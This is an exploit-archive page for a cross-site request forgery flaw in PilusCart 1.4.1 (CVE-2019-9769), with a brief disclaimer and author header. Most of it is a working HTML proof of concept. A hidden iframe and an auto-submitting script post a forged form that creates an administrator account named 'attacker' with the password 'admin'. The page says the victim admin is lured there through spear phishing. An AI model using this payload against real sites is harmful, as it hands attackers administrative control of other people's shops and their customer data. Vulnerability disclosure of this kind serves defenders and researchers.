Piluscart 1.4.1 crosssite request forgery (add admin) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-03-12 | Type : webapps | Platform : php
This exploit / vulnerability Piluscart 1.4.1 crosssite request forgery (add admin) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)
# Google Dork: N/A
# Date: 10-03-2019
# Exploit Author: Gionathan "John" Reale
# Vendor Homepage: https://github.com/piluscart
# Software Link: https://sourceforge.net/projects/pilus/files/PiLUS/1.4.1/PiLUS-1.4.1-Ubiungu-stable.zip/download
# Version: 1.4.1
# Tested on: ParrotOS
# CVE : 2019-9769

PilusCart 1.4.1 is vulnerable to CSRF attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), a form will be submitted that will add a new user as administrator.


PoC:


<html>
<iframe style="width:0;height:0;border:0; border:none;" name="csrf-frame"></iframe>

<form name="adduser" action="http://server/cabin/index.php?module=users&action=newUser" method="post" target="csrf-frame">
<input type="submit">
<input type="hidden" name="admin_id" value="">
<input type="hidden" name="session_id" value="">
<input type="hidden" name="admin_login" value="attacker">
<input type="hidden" name="admin_fullname" value="attacker">
<input type="hidden" name="admin_email" value="admin@attacker.com">
<input type="hidden" name="admin_pass" value="admin">
<input type="hidden" name="confirm_pass" value="admin">
<input type="hidden" name="admin_level" value="admin">
<input type="hidden" name="admin_url" value="">
<input type="hidden" name="saveAdmin" value="Simpan">

</form>

<script>
document.forms.adduser.submit();
</script>
</html>